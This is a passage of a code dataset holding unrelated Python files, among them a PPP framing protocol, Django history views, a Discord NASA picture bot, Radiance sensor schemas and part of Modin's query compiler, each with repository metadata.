self.assertEqual(test_pattern_canvas.pattern, [\n [0, 1, 0],\n [0, 0, 1],\n [1, 1, 1]\n ])\n\n def test_init_with_blinker(self):\n \"\"\"Test if a PatternCanvas can be initialised that it contains a blinker.\n\n See:\n https://en.wikipedia.org/wiki/Conway's_Game_of_Life#Examples_of_patterns\n for detailed description of this figure.\n \"\"\"\n\n test_pattern_canvas = conwaysgameoflife.PatternCanvas(\"blinker\")\n\n self.assertEqual(test_pattern_canvas.pattern, [\n [0, 1, 0],\n [0, 1, 0],\n [0, 1, 0]\n ])\n\n # def test_rotation_to_the_right(self):\n # \"\"\"Test if a PatternCanvas can be rotated.\n #\n # To the right in this case.\n #\n # First just test if the method exists and rotates a single alive cell.\n # \"\"\"\n #\n # test_pattern_canvas = conwaysgameoflife.PatternCanvas(None, None, \"single_cell\")\n # test_pattern_canvas.alive_cells = [[0]]\n #\n # test_pattern_canvas.rotate_right()\n #\n # self.assertEqual(test_pattern_canvas.alive_cells, [[0]])\n","sub_path":"test/test_patternCanvas.py","file_name":"test_patternCanvas.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"152127987","text":"# module load\nimport pandas as pd\nfrom module.norm import normalization\nfrom module.model import mlplinear\nfrom module import visual\n\n# data load\ndataset = pd.read_csv(\"./datas/dataset2.csv\") \n\n# normalization data for MLP layers\nnorm_dataset = normalization(dataset)\ndataset = norm_dataset.forward()\n\n# Split data 8:2\ntrain_data = dataset.sample(frac=0.8, random_state=0)\ntest_data = dataset.drop(train_data.index)\n\n# pop y data\ny_train_data = train_data.pop(\"avgPrice\")\ny_test_data = test_data.pop(\"avgPrice\")\n\n# build mlp model\ndim = len(train_data.columns) \nmlplinear = mlplinear(dim=dim, learning_rate=0.000005, epochs=10000, x_data=train_data, y_data=y_train_data, batch_size=8)\n'''\nmlplinear package need \nx dimention , learning rate, epochs, x_data, y_data, batch_size, validation split rate\n'''\n\nmodel = mlplinear.build() #.build() build MLP linear layers\nhistory = mlplinear.prediction(model) # predition need layers data\nhistory.model.save('./datas/my_model.h5')\n\n# evaluate \nloss, mae, mse = history.model.evaluate(test_data, y_test_data, verbose=2)\nmae = norm_dataset.y_backward(mae)\nprint(\"테스트 세트의 평균 절대 오차: {:5.2f} Price\".format(mse))\n\n# log data save .csv format\nhist = pd.DataFrame(history.history) \nhist['epoch'] = history.epoch\nhist.to_csv(\"./datas/log_data.csv\",index=False)\n\n# log data visualization\nlog_data = pd.read_csv(\"./datas/log_data.csv\") \nvisual.plot_history(log_data) # plot_history need only log dataframe, MAE, MSE plot\n\n# test prediction visualization\ntest_predictions = model.predict(test_data).flatten()\nvisual.plot_error(test_predictions, y_test_data) # plot_error(predict y, real y) plot True vs Predictions, prediction - real data\n","sub_path":"Green-Onion-price-reg/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"423182324","text":"import logging\nfrom struct import pack\nfrom zope.interface import implements\nfrom twisted.internet.protocol import ProcessProtocol\nfrom twisted.internet import reactor, interfaces\n\nfrom constants import VERBOSE\nfrom fcs import pppfcs16\nfrom utils import hexdump\n\n\nFLAG_SEQUENCE = b'\\x7e'\nCONTROL_ESCAPE = b'\\x7d'\n\nclass PPPDProtocol(ProcessProtocol):\n implements(interfaces.IPushProducer)\n\n frameBuffer = bytearray()\n paused = False\n\n def writeFrame(self, frame):\n fcs = pppfcs16(frame)\n buffer = bytearray(FLAG_SEQUENCE)\n for byte in frame:\n if ord(byte) < 0x20 or byte in (FLAG_SEQUENCE, CONTROL_ESCAPE):\n buffer.append(CONTROL_ESCAPE)\n buffer.append(ord(byte) ^ 0x20)\n else:\n buffer.append(byte)\n\n buffer.extend(pack('!H', fcs))\n buffer.append(FLAG_SEQUENCE)\n self.transport.write(str(buffer))\n\n\n def outReceived(self, data):\n logging.log(VERBOSE, \"Raw data: %s\", hexdump(data))\n escaped = False\n for byte in data:\n if escaped:\n escaped = False\n self.frameBuffer.append(ord(byte) ^ 0x20)\n elif byte == CONTROL_ESCAPE:\n escaped = True\n elif byte == FLAG_SEQUENCE:\n if not self.frameBuffer:\n continue\n if len(self.frameBuffer) < 4:\n logging.warning(\"Invalid PPP frame received from pppd. (%s)\",\n hexdump(self.frameBuffer))\n elif self.frameBuffer:\n del self.frameBuffer[-2:] # Remove FCS field\n self.pppFrameReceived(self.frameBuffer)\n self.frameBuffer = bytearray()\n else:\n self.frameBuffer.append(byte)\n\n\n def pppFrameReceived(self, frame):\n if self.paused:\n logging.debug('Drop a PPP frame.')\n return\n\n if frame.startswith('\\xff\\x03'):\n protocol = frame[2:4]\n else:\n protocol = frame[:2]\n\n if protocol[0] in (0x80, 0x82, 0xc0, 0xc2, 0xc4):\n self.sstp.writePPPControlFrame(frame)\n else:\n self.sstp.writePPPDataFrame(frame)\n\n\n def errReceived(self, data):\n logging.warn('Received errors from pppd.')\n logging.warn(data)\n\n\n def outConnectionLost(self):\n logging.debug('pppd stdout lost.')\n self.sstp.transport.loseConnection()\n\n\n def processEnded(self, reason):\n logging.info('pppd stopped.')\n self.sstp.pppStoped()\n\n\n def stopProducing(self):\n self.paused = True\n self.transport.loseConnection()\n\n\n def pauseProducing(self):\n logging.debug('Pause producting')\n self.paused = True\n\n\n def resumeProducing(self):\n logging.debug('Resume producing')\n self.paused = False\n\n","sub_path":"sstpd/ppp.py","file_name":"ppp.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"341581856","text":"import argparse\nimport sys_path\nsys_path.insert_sys_path()\nfrom report.lib_delta_report.phocr_mem_peak_reporter import PHOcrMemoryPeakReporter\n\n\ndef parse_argument():\n parser = argparse.ArgumentParser(\n description='Run test to check memory peak for all nominated test case.')\n parser.add_argument('-t', '--test-folder', required=True,\n help='Folder contain test set')\n parser.add_argument('-r', '--test-file', required=True,\n help=\"Test result file which is generated from run_all.py\")\n parser.add_argument('-c', '--combined-file', required=True,\n help=\"Combine result file which is generated from \"\n \"combine_all_mem_peak.py\")\n\n return parser.parse_args()\n\n\ndef main():\n args = parse_argument()\n\n memory_peak_reporter = PHOcrMemoryPeakReporter(test_folder=args.test_folder,\n test_file=args.test_file,\n combine_file=args.combined_file)\n memory_peak_reporter.do_work()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Run_PHocr_test/Mekong/utilities/utilities/report/report_mem_peak_infomation.py","file_name":"report_mem_peak_infomation.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"45522638","text":"\"\"\"SensorGrid and Sensor Schema\"\"\"\nfrom pydantic import Field, constr, validator\nfrom typing import List\nfrom enum import Enum\nfrom ..geometry import Mesh3D\nfrom .._base import NoExtraBaseModel\nfrom ._base import IDdRadianceBaseModel\n\nimport re\n\n\nclass _RadianceAsset(IDdRadianceBaseModel):\n \"\"\"Hidden base class for all Radiance Assets.\"\"\"\n\n display_name: str = Field(\n default=None,\n description='Text string for a unique display name, used to set the default '\n 'file name that the radiance asset is written to within a radiance folder. '\n 'Must not contain spaces or special characters.'\n )\n\n @validator('display_name')\n def valid_rad_string_display_name(cls, value):\n \"\"\"Check that a string is valid for Radiance.\n\n This method is modified from the honeybee-core.typing.valid_rad_string method.\n \"\"\"\n if value is not None:\n try:\n illegal_match = re.search(r'[^.A-Za-z0-9_-]', value)\n except TypeError:\n raise TypeError('display_name must be a text string. Got {}: {}.'.format(\n type(value), value))\n assert illegal_match is None, \\\n 'Illegal character \"{}\" found in display_name'.format(illegal_match.group(0))\n assert len(value) > 0, \\\n 'Input display_name \"{}\" contains no characters.'.format(value)\n return value\n\n room_identifier: str = Field(\n None,\n regex=r'[A-Za-z0-9_-]',\n min_length=1,\n max_length=100,\n description='Optional text string for the Room identifier to which this '\n 'object belongs. This will be used to narrow down the number of '\n 'aperture groups that have to be run with this sensor grid. If None, '\n 'the grid will be run with all aperture groups in the model.'\n )\n\n light_path: List[List[str]] = Field(\n None,\n description='Get or set a list of lists for the light path from the object to '\n 'the sky. Each sub-list contains identifiers of aperture groups through which '\n 'light passes. (eg. [[\"SouthWindow1\"], [\"static_apertures\", \"NorthWindow2\"]]).'\n 'Setting this property will override any auto-calculation of the light '\n 'path from the model and room_identifier upon export to the simulation.'\n )\n\n\nclass Sensor(NoExtraBaseModel):\n \"\"\"A single Radiance of sensors.\"\"\"\n\n type: constr(regex='^Sensor$') = 'Sensor'\n\n pos: List[float] = Field(\n ...,\n description=\"Position of sensor in space as an array of (x, y, z) values.\",\n min_items=3,\n max_items=3\n )\n\n dir: List[float] = Field(\n ...,\n description=\"Direction of sensor as an array of (x, y, z) values.\",\n min_items=3,\n max_items=3\n )\n\n\nclass SensorGrid(_RadianceAsset):\n \"\"\"A grid of sensors.\"\"\"\n\n type: constr(regex='^SensorGrid$') = 'SensorGrid'\n\n sensors: List[Sensor] = Field(\n ...,\n description='A list of sensors that belong to the grid.'\n )\n\n mesh: Mesh3D = Field(\n None,\n description='An optional Mesh3D that aligns with the sensors and can be '\n 'used for visualization of the grid. Note that the number of sensors in '\n 'the grid must match the number of faces or the number vertices within '\n 'the Mesh3D.'\n )\n\n\nclass ViewType(str, Enum):\n \"\"\"A single character for the view type (-vt).\"\"\"\n perspective = 'v'\n hemispherical_fisheye = 'h'\n parallel = 'l'\n cylindrical_panorama = 'c'\n angular_fisheye = 'a'\n planisphere = 's'\n\n\nclass View(_RadianceAsset):\n \"\"\"A single Radiance of sensors.\"\"\"\n\n type: constr(regex='^View$') = 'View'\n\n position: List[float] = Field(\n ...,\n description='The view position (-vp) as an array of (x, y, z) values.'\n 'This is the focal point of a perspective view or the center of a '\n 'parallel projection.',\n min_items=3,\n max_items=3\n )\n\n direction: List[float] = Field(\n ...,\n description='The view direction (-vd) as an array of (x, y, z) values.'\n 'The length of this vector indicates the focal distance as needed by '\n 'the pixel depth of field (-pd) in rpict.',\n min_items=3,\n max_items=3\n )\n\n up_vector: List[float] = Field(\n ...,\n description='The view up (-vu) vector as an array of (x, y, z) values.',\n min_items=3,\n max_items=3\n )\n\n view_type: ViewType = ViewType.perspective\n\n h_size: float = Field(\n 60,\n description='A number for the horizontal field of view in degrees (for '\n 'all perspective projections including fisheye). For a parallel '\n 'projection, this is the view width in world coordinates.'\n )\n\n v_size: float = Field(\n 60,\n description='A number for the vertical field of view in degrees (for '\n 'all perspective projections including fisheye). For a parallel '\n 'projection, this is the view width in world coordinates.'\n )\n\n shift: float = Field(\n None,\n description='The view shift (-vs). This is the amount the actual '\n 'image will be shifted to the right of the specified view. This '\n 'option is useful for generating skewed perspectives or rendering '\n 'an image a piece at a time. A value of 1 means that the rendered '\n 'image starts just to the right of the normal view. A value of -1 '\n 'would be to the left. Larger or fractional values are permitted '\n 'as well.'\n )\n\n lift: float = Field(\n None,\n description='The view lift (-vl). This is the amount the actual '\n 'image will be lifted up from the specified view. This '\n 'option is useful for generating skewed perspectives or rendering '\n 'an image a piece at a time. A value of 1 means that the rendered '\n 'image starts just to the right of the normal view. A value of -1 '\n 'would be to the left. Larger or fractional values are permitted '\n 'as well.'\n )\n\n fore_clip: float = Field(\n None,\n description='View fore clip (-vo) at a distance from the view point.'\n 'The plane will be perpendicular to the view direction for perspective '\n 'and parallel view types. For fisheye view types, the clipping plane is '\n 'actually a clipping sphere, centered on the view point with fore_clip radius. '\n 'Objects in front of this imaginary surface will not be visible.'\n )\n\n aft_clip: float = Field(\n None,\n description='View aft clip (-va) at a distance from the view point.'\n 'Like the view fore plane, it will be perpendicular to the view '\n 'direction for perspective and parallel view types. For fisheye '\n 'view types, the clipping plane is actually a clipping sphere, '\n 'centered on the view point with radius val.'\n )\n","sub_path":"honeybee_schema/radiance/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"152549489","text":"\"\"\"\nProcesses input after it has been parsed. Performs the dataflow for input.\n\"\"\"\nimport numpy as np\n\nfrom .summaries import *\nfrom .util import *\nfrom .model_building import build_model\nfrom .model_application import apply_model\nfrom .model_evaluation import evaluate_model\nfrom .data_processing import process_data\n\ndef handle(parsing, verbose, web=False):\n\n '''\n :parsing - Parsed pyparsing object\n :verbose - boolean variable used to control type of messaged displayed to console\n Main Function that handles model phase, apply phase, and metric phase of SML\n '''\n keywords = keyword_check(parsing)\n\n df, data_train, data_test = process_data(keywords,verbose)\n model, algoType, summary_msg = build_model(keywords, data_train ,verbose)\n\n if df is None and model is None:\n print(\"Please either READ in data or select a Model to build\")\n return None\n\n\n if model is not None: # If model isn't created no need to run through apply phase\n apply_result = apply_model(keywords, model, data_test)\n return apply_result\n else:\n apply_result = None\n\n if keywords.get('plot'): # for now plot is the only thing that needs to be specified\n metric_result = evaluate_model(keywords, model, algoType, df, X_train, y_train, X_test, y_test, web)\n else:\n metric_result = None\n\n if web:\n return {'model_summary': summary_msg, 'apply_summary': apply_result, 'metric_summary': metric_result}\n","sub_path":"sml/connector/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533486229","text":"import unittest, TxtMark.TxtMarker, os\n\n\nclass TxtMarkerCase(unittest.TestCase):\n def test_maker_case(self):\n f = open(\"srcFile.txt\", \"w\")\n f.write(\"title\\n\\nthis is a content\\n\\nthis a come after content\\n\\n\")\n f.close()\n matchcase1 = \"...\" \\\n \"

title

this is a content

this a come after content

\"\n TxtMark.TxtMarker.mark(\"srcFile.txt\", \"destFile.txt\")\n f = open(\"destFile.txt\", \"r\")\n matchcase2 = f.read()\n os.remove(\"srcFile.txt\")\n os.remove(\"destFile.txt\")\n self.assertEqual(matchcase1,matchcase2,\"test\")\n","sub_path":"TxtMark/ut/TxtMarkerTest.py","file_name":"TxtMarkerTest.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"429243428","text":"import requests\r\n\r\n\r\n\r\ndef request_nlu(text, project_dir, port):\r\n url = 'http://localhost:' + port + '/parse'\r\n print(url)\r\n data = {\r\n \"q\": text,\r\n \"project\": project_dir,\r\n \"model\": \"nlu\"\r\n }\r\n try:\r\n response = requests.post(url, json=data)\r\n except Exception as e:\r\n print(e)\r\n return None\r\n \r\n return response.json()\r\n\r\n\r\nif __name__ == '__main__':\r\n print(request_nlu('Li Fu', 'name_server', '5061'))","sub_path":"request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613495349","text":"# Create your views here.\nfrom django.template import RequestContext\nfrom history.models import Item, Skill\nfrom django.shortcuts import get_object_or_404\nfrom lib.overrides import render_response\nfrom django.core.paginator import Paginator, InvalidPage, EmptyPage\nimport time\nfrom calendar import month_name\nimport datetime\nfrom django.db.models import Q\n\ndef get_date_list():\n\t\"\"\"Get a list of years and months for the posts\"\"\"\n\n\tif not Item.objects.count(): return []\n\n\tyear, month = time.localtime()[:2]\n\tfirst = Item.objects.order_by(\"start_date\")[0]\n\tfyear = first.start_date.year\n\tdates = []\n\n\t# Loop over the years and months\n\tfor y in xrange(year, fyear - 1, -1):\n\t\tdates.append(y)\n\n\treturn dates\n\ndef paginate_items(request, items):\n paginator = Paginator(items,10)\n\n try: page = int(request.GET.get(\"page\",'1'))\n except ValueError: page = 1\n\n try: items = paginator.page(page)\n except (InvalidPage,EmptyPage):\n items = paginator.page(paginator.num_pages)\n\n return items\n\ndef history(request):\n\titems = Item.objects.filter(published=True).order_by(\"-end_date\")\n\titems = paginate_items(request, items)\n\tdates = get_date_list()\n\treturn render_response(request, 'history/index.html', {\n\t\t'skills': Skill.objects.all(),\n\t\t'items': items,\n\t\t'archive_list': dates\n\t\t})\n\ndef view_item(request, slug):\n\tdates = get_date_list()\n\treturn render_response(request, 'history/view_item.html', {\n\t\t'skills': Skill.objects.all(),\n\t\t'item': get_object_or_404(Item, slug=slug),\n\t\t'archive_list': dates\n\t\t})\n\ndef view_skill(request, slug):\n\tskill = get_object_or_404(Skill, slug=slug)\n\titems = Item.objects.filter(published=True, skills=skill).order_by(\"-end_date\")\n\titems = paginate_items(request, items)\n\tdates = get_date_list()\n\n\treturn render_response(request, 'history/skill.html', {\n\t\t'skills': Skill.objects.all(),\n\t\t'items': items,\n\t\t'skill': skill,\n\t\t'archive_list': dates\n\t\t})\n\ndef archive(request, year):\n\titems = \\\n\t Item.objects.filter(published = True,\n\t\t\t\t\t\t start_date__lte = datetime.date(eval(year),12,31),\n\t\t\t\t\t\t end_date__gte = \\\n\t\t\t\t\t\t datetime.date(eval(year),1,1)).order_by(\"-end_date\")\n\titems = paginate_items(request, items)\n\tdates = get_date_list()\n\n\treturn render_response(request, 'history/archive.html', {\n\t\t'skills': Skill.objects.all(),\n\t\t'items': items,\n\t\t'year': year,\n\t\t'archive_list': dates\n\t\t})\n","sub_path":"history/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219001182","text":"import discord\nfrom discord.ext import commands\nimport json\nimport asyncio\nimport aiohttp\nimport async_timeout\nimport time\n\nsettings_json = open('settings.json', 'r')\nsettings_json = settings_json.read().strip()\nsettings_json = json.loads(settings_json)\n\nnasa_key = settings_json['nasa_api_key']\n\n\nasync def fetchGet(urlIn):\n async with aiohttp.ClientSession() as session:\n with async_timeout.timeout(10):\n async with session.get(urlIn) as response:\n return await response.text()\n\ngotToday = \"\"\n\n\nclass Apod():\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def apod(self, ctx):\n channel = ctx.message.channel\n global gotToday\n global apod_em\n today = time.strftime(\"%Y-%m-%d\")\n if today != gotToday:\n apod_json = await fetchGet('https://api.nasa.gov/planetary/apod?date={0}&api_key={1}'.format(today, nasa_key))\n apod_json=json.loads(apod_json)\n apod_pic_url=apod_json['hdurl']\n gotToday=today\n apod_em=discord.Embed(\n title = 'Nasa - Astronomy Picture Of The Day', colour = 0xD3D92)\n apod_em.set_image(url = '{0}'.format(apod_pic_url))\n await channel.send(embed = apod_em)\n else:\n await channel.send(embed = apod_em)\n\ndef setup(bot):\n bot.add_cog(Apod(bot))\n","sub_path":"nasabot-apod.py","file_name":"nasabot-apod.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"76040955","text":"# Licensed to Modin Development Team under one or more contributor license agreements.\n# See the NOTICE file distributed with this work for additional information regarding\n# copyright ownership. The Modin Development Team licenses this file to you under the\n# Apache License, Version 2.0 (the \"License\"); you may not use this file except in\n# compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under\n# the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n\"\"\"\nModule contains class ``BaseQueryCompiler``.\n\n``BaseQueryCompiler`` is a parent abstract class for any other query compiler class.\n\"\"\"\n\nimport abc\n\nfrom modin.data_management.functions.default_methods import (\n DataFrameDefault,\n SeriesDefault,\n DateTimeDefault,\n StrDefault,\n BinaryDefault,\n ResampleDefault,\n RollingDefault,\n CatDefault,\n GroupByDefault,\n)\nfrom modin.error_message import ErrorMessage\nimport modin.backends.base.doc_utils as doc_utils\n\nfrom pandas.core.dtypes.common import is_scalar\nimport pandas.core.resample\nimport pandas\nimport numpy as np\nfrom typing import List, Hashable\n\n\ndef _get_axis(axis):\n \"\"\"\n Build index labels getter of the specified axis.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to get labels from.\n\n Returns\n -------\n callable(BaseQueryCompiler) -> pandas.Index\n \"\"\"\n\n def axis_getter(self):\n ErrorMessage.default_to_pandas(f\"DataFrame.get_axis({axis})\")\n return self.to_pandas().axes[axis]\n\n return axis_getter\n\n\ndef _set_axis(axis):\n \"\"\"\n Build index labels setter of the specified axis.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to set labels on.\n\n Returns\n -------\n callable(BaseQueryCompiler)\n \"\"\"\n\n def axis_setter(self, labels):\n new_qc = DataFrameDefault.register(pandas.DataFrame.set_axis)(\n self, axis=axis, labels=labels\n )\n self.__dict__.update(new_qc.__dict__)\n\n return axis_setter\n\n\n# FIXME: many of the BaseQueryCompiler methods are hiding actual arguments\n# by using *args and **kwargs. They should be spread into actual parameters.\n# Currently actual arguments are placed in the methods docstrings, but since they're\n# not presented in the function's signature it makes linter to raise `PR02: unknown parameters`\n# warning. For now, they're silenced by using `noqa` (Modin issue #3108).\nclass BaseQueryCompiler(abc.ABC):\n \"\"\"\n Abstract class that handles the queries to Modin dataframes.\n\n This class defines common query compilers API, most of the methods\n are already implemented and defaulting to pandas.\n\n Attributes\n ----------\n lazy_execution : bool\n Whether underlying execution engine is designed to be executed in a lazy mode only.\n If True, such QueryCompiler will be handled differently at the front-end in order\n to reduce execution triggering as much as possible.\n\n Notes\n -----\n See the Abstract Methods and Fields section immediately below this\n for a list of requirements for subclassing this object.\n \"\"\"\n\n @abc.abstractmethod\n def default_to_pandas(self, pandas_op, *args, **kwargs):\n \"\"\"\n Do fallback to pandas for the passed function.\n\n Parameters\n ----------\n pandas_op : callable(pandas.DataFrame) -> object\n Function to apply to the casted to pandas frame.\n *args : iterable\n Positional arguments to pass to `pandas_op`.\n **kwargs : dict\n Key-value arguments to pass to `pandas_op`.\n\n Returns\n -------\n BaseQueryCompiler\n The result of the `pandas_op`, converted back to ``BaseQueryCompiler``.\n \"\"\"\n pass\n\n # Abstract Methods and Fields: Must implement in children classes\n # In some cases, there you may be able to use the same implementation for\n # some of these abstract methods, but for the sake of generality they are\n # treated differently.\n\n lazy_execution = False\n\n # Metadata modification abstract methods\n def add_prefix(self, prefix, axis=1):\n \"\"\"\n Add string prefix to the index labels along specified axis.\n\n Parameters\n ----------\n prefix : str\n The string to add before each label.\n axis : {0, 1}, default: 1\n Axis to add prefix along. 0 is for index and 1 is for columns.\n\n Returns\n -------\n BaseQueryCompiler\n New query compiler with updated labels.\n \"\"\"\n if axis:\n return DataFrameDefault.register(pandas.DataFrame.add_prefix)(\n self, prefix=prefix\n )\n else:\n return SeriesDefault.register(pandas.Series.add_prefix)(self, prefix=prefix)\n\n def add_suffix(self, suffix, axis=1):\n \"\"\"\n Add string suffix to the index labels along specified axis.\n\n Parameters\n ----------\n suffix : str\n The string to add after each label.\n axis : {0, 1}, default: 1\n Axis to add suffix along. 0 is for index and 1 is for columns.\n\n Returns\n -------\n BaseQueryCompiler\n New query compiler with updated labels.\n \"\"\"\n if axis:\n return DataFrameDefault.register(pandas.DataFrame.add_suffix)(\n self, suffix=suffix\n )\n else:\n return SeriesDefault.register(pandas.Series.add_suffix)(self, suffix=suffix)\n\n # END Metadata modification abstract methods\n\n # Abstract copy\n\n def copy(self):\n \"\"\"\n Make a copy of this object.\n\n Returns\n -------\n BaseQueryCompiler\n Copy of self.\n\n Notes\n -----\n For copy, we don't want a situation where we modify the metadata of the\n copies if we end up modifying something here. We copy all of the metadata\n to prevent that.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.copy)(self)\n\n # END Abstract copy\n\n # Abstract join and append helper functions\n\n def concat(self, axis, other, **kwargs): # noqa: PR02\n \"\"\"\n Concatenate `self` with passed query compilers along specified axis.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to concatenate along. 0 is for index and 1 is for columns.\n other : BaseQueryCompiler or list of such\n Objects to concatenate with `self`.\n join : {'outer', 'inner', 'right', 'left'}, default: 'outer'\n Type of join that will be used if indices on the other axis are different.\n (note: if specified, has to be passed as ``join=value``).\n ignore_index : bool, default: False\n If True, do not use the index values along the concatenation axis.\n The resulting axis will be labeled 0, …, n - 1.\n (note: if specified, has to be passed as ``ignore_index=value``).\n sort : bool, default: False\n Whether or not to sort non-concatenation axis.\n (note: if specified, has to be passed as ``sort=value``).\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Concatenated objects.\n \"\"\"\n concat_join = [\"inner\", \"outer\"]\n\n def concat(df, axis, other, **kwargs):\n kwargs.pop(\"join_axes\", None)\n ignore_index = kwargs.get(\"ignore_index\", False)\n if kwargs.get(\"join\", \"outer\") in concat_join:\n if not isinstance(other, list):\n other = [other]\n other = [df] + other\n result = pandas.concat(other, axis=axis, **kwargs)\n else:\n if isinstance(other, (list, np.ndarray)) and len(other) == 1:\n other = other[0]\n ignore_index = kwargs.pop(\"ignore_index\", None)\n kwargs[\"how\"] = kwargs.pop(\"join\", None)\n result = df.join(other, rsuffix=\"r_\", **kwargs)\n if ignore_index:\n if axis == 0:\n result = result.reset_index(drop=True)\n else:\n result.columns = pandas.RangeIndex(len(result.columns))\n return result\n\n return DataFrameDefault.register(concat)(self, axis=axis, other=other, **kwargs)\n\n # END Abstract join and append helper functions\n\n # Data Management Methods\n @abc.abstractmethod\n def free(self):\n \"\"\"Trigger a cleanup of this object.\"\"\"\n pass\n\n @abc.abstractmethod\n def finalize(self):\n \"\"\"Finalize constructing the dataframe calling all deferred functions which were used to build it.\"\"\"\n pass\n\n # END Data Management Methods\n\n # To/From Pandas\n @abc.abstractmethod\n def to_pandas(self):\n \"\"\"\n Convert underlying query compilers data to ``pandas.DataFrame``.\n\n Returns\n -------\n pandas.DataFrame\n The QueryCompiler converted to pandas.\n \"\"\"\n pass\n\n @classmethod\n @abc.abstractmethod\n def from_pandas(cls, df, data_cls):\n \"\"\"\n Build QueryCompiler from pandas DataFrame.\n\n Parameters\n ----------\n df : pandas.DataFrame\n The pandas DataFrame to convert from.\n data_cls : type\n :py:class:`~modin.engines.base.frame.data.BasePandasFrame` class\n (or its descendant) to convert to.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing data from the pandas DataFrame.\n \"\"\"\n pass\n\n # END To/From Pandas\n\n # From Arrow\n @classmethod\n @abc.abstractmethod\n def from_arrow(cls, at, data_cls):\n \"\"\"\n Build QueryCompiler from Arrow Table.\n\n Parameters\n ----------\n at : Arrow Table\n The Arrow Table to convert from.\n data_cls : type\n :py:class:`~modin.engines.base.frame.data.BasePandasFrame` class\n (or its descendant) to convert to.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing data from the pandas DataFrame.\n \"\"\"\n pass\n\n # END From Arrow\n\n # To NumPy\n\n def to_numpy(self, **kwargs): # noqa: PR02\n \"\"\"\n Convert underlying query compilers data to NumPy array.\n\n Parameters\n ----------\n dtype : dtype\n The dtype of the resulted array.\n copy : bool\n Whether to ensure that the returned value is not a view on another array.\n na_value : object\n The value to replace missing values with.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n np.ndarray\n The QueryCompiler converted to NumPy array.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.to_numpy)(self, **kwargs)\n\n # END To NumPy\n\n # Abstract inter-data operations (e.g. add, sub)\n # These operations require two DataFrames and will change the shape of the\n # data if the index objects don't match. An outer join + op is performed,\n # such that columns/rows that don't have an index on the other DataFrame\n # result in NaN values.\n\n @doc_utils.doc_binary_method(operation=\"addition\", sign=\"+\")\n def add(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.add)(self, other=other, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.combine\")\n def combine(self, other, **kwargs): # noqa: PR02\n \"\"\"\n Perform column-wise combine with another QueryCompiler with passed `func`.\n\n If axes are not equal, perform frames alignment first.\n\n Parameters\n ----------\n other : BaseQueryCompiler\n Left operand of the binary operation.\n func : callable(pandas.Series, pandas.Series) -> pandas.Series\n Function that takes two ``pandas.Series`` with aligned axes\n and returns one ``pandas.Series`` as resulting combination.\n fill_value : float or None\n Value to fill missing values with after frame alignment occurred.\n overwrite : bool\n If True, columns in `self` that do not exist in `other`\n will be overwritten with NaNs.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Result of combine.\n \"\"\"\n return BinaryDefault.register(pandas.DataFrame.combine)(\n self, other=other, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.combine_first\")\n def combine_first(self, other, **kwargs): # noqa: PR02\n \"\"\"\n Fill null elements of `self` with value in the same location in `other`.\n\n If axes are not equal, perform frames alignment first.\n\n Parameters\n ----------\n other : BaseQueryCompiler\n Provided frame to use to fill null values from.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n return BinaryDefault.register(pandas.DataFrame.combine_first)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"equality comparison\", sign=\"==\")\n def eq(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.eq)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(operation=\"integer division\", sign=\"//\")\n def floordiv(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.floordiv)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(\n operation=\"greater than or equal comparison\", sign=\">=\", op_type=\"comparison\"\n )\n def ge(self, other, **kwargs): # noqa: PR02\n return 